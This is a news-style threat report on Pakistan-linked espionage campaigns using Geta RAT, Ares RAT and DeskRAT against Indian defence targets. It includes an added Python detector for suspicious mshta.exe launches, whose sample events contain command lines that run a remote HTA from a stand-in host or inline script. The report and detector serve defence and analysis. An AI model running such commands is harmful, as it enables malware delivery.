Numerous campaigns aimed at infiltrating Windows and Linux environments with remote access trojans that can steal confidential information and guarantee ongoing access to compromised machines have targeted the Indian defense industry and government-affiliated organizations. This article explores these well-resourced espionage campaigns. Malware families like Geta RAT, Ares RAT, and DeskRAT are used in the campaigns; these are frequently linked to threat clusters associated with Pakistan, such as SideCopy and APT36 (also known as Transparent Tribe).
SideCopy, which has been in operation since at least 2019, is evaluated as functioning as a Transparent Tribe subsidiary. Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka, stated that when taken as a whole, these campaigns "reinforce a familiar but evolving narrative."
"SideCopy and Transparent Tribe are improving espionage, not creating it from scratch." "This ecosystem continues to function below the noise floor while retaining strategic focus by extending cross-platform coverage, relying on memory-resident techniques, and experimenting with new delivery vectors." Phishing emails with malicious attachments or embedded download links that direct potential targets to infrastructure under the control of the attacker are a common feature of all the campaigns.
These first access methods act as a conduit for PowerPoint Add-In files, ELF binaries, and Windows shortcuts (LNK), which, when accessed, initiate a multi-step procedure that releases the trojans. The malware families are made to operate in both Windows and Linux environments, allowing for persistent remote access, system reconnaissance, data collection, command execution, and long-term post-compromise operations.
In one of the attack chains, a malicious LNK file invokes "mshta.exe" to execute an HTML Application (HTA) file hosted on compromised legitimate domains. The HTA payload uses JavaScript to decrypt an embedded DLL payload, which then processes an embedded data blob to write a decoy PDF to disk, connects to a hard-coded command-and-control (C2) server, and displays the saved decoy file.
Once the lure document is displayed, the malware checks whether any security products are installed, adjusts its persistence strategy accordingly, and then launches Geta RAT on the compromised host. It's important to note that this attack chain was described in late December 2025 by researcher Sathwik Ram Prakki of CYFIRMA and Seqrite Labs.
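The LNK-to-mshta.exe-to-remote-HTA step of the chain above is a natural detection point. The following is an added example (not code from the article or from any of the vendors it cites) that flags mshta.exe process-creation events whose command line fetches a remote HTA or runs inline script; the event field names and all sample events are constructed.

```python
"""Flag mshta.exe launches matching the LNK -> mshta.exe -> remote HTA chain.

Events are constructed Sysmon-style process-creation records (Image, CommandLine,
ParentImage), not real telemetry; the field names are an assumption.
"""
import re

# Constructed sample events: two suspicious mshta launches, one benign local HTA,
# and one unrelated process.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://docs.example-lure.test/brief.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "javascript:new ActiveXObject(...)"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)          # HTA pulled from a remote host
INLINE_SCRIPT_RE = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
# Parents typical of a user opening a shortcut or mail attachment (contextual only).
USER_FACING_PARENTS = {"explorer.exe", "outlook.exe", "winword.exe", "powerpnt.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons an mshta.exe event looks suspicious; empty list if none."""
    if basename(event["Image"]) != "mshta.exe":
        return []
    cmd = event["CommandLine"]
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("mshta fetching remote HTA")
    if INLINE_SCRIPT_RE.search(cmd):
        reasons.append("mshta running inline script")
    # Parent context is only reported when a content-based reason already fired,
    # so a user double-clicking a local HTA is not flagged on parent alone.
    if reasons and basename(event["ParentImage"]) in USER_FACING_PARENTS:
        reasons.append("launched from " + basename(event["ParentImage"]))
    return reasons


def detect(events):
    """Return (index, reasons) for every event that classify() flags."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```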
Geta RAT supports a number of commands to gather system information, list installed apps, terminate a specific process, enumerate running processes, retrieve and replace clipboard contents with attacker-supplied data, take screenshots, execute arbitrary shell commands, run file operations, and harvest data from connected USB devices. A Linux variant of this Windows-focused campaign starts from a Go binary that downloads a shell script from an external server, which in turn drops the Python-based Ares RAT. Similar to Geta RAT, Ares RAT can execute a variety of commands to run Python scripts or commands from the threat actor and harvest sensitive data.
According to Aryaka, it also noticed another campaign in which the Golang malware, DeskRAT, is distributed through a malicious PowerPoint Add-In file that launches an embedded macro to connect to a distant server and retrieve the malware. In October 2025, Sekoia and QiAnXin XLab documented how DeskRAT was used by APT36. According to the company, "these campaigns show a well-resourced, espionage-focused threat actor purposefully targeting Indian defense, government, and strategic sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure."
"The activity encompasses not only defense but also critical infrastructure, research, policy, and defense-related organizations functioning within the same trusted ecosystem." "DeskRAT's deployment, along with Geta RAT and Ares RAT, highlights an evolving toolkit optimized for long-term access, stealth, and persistence."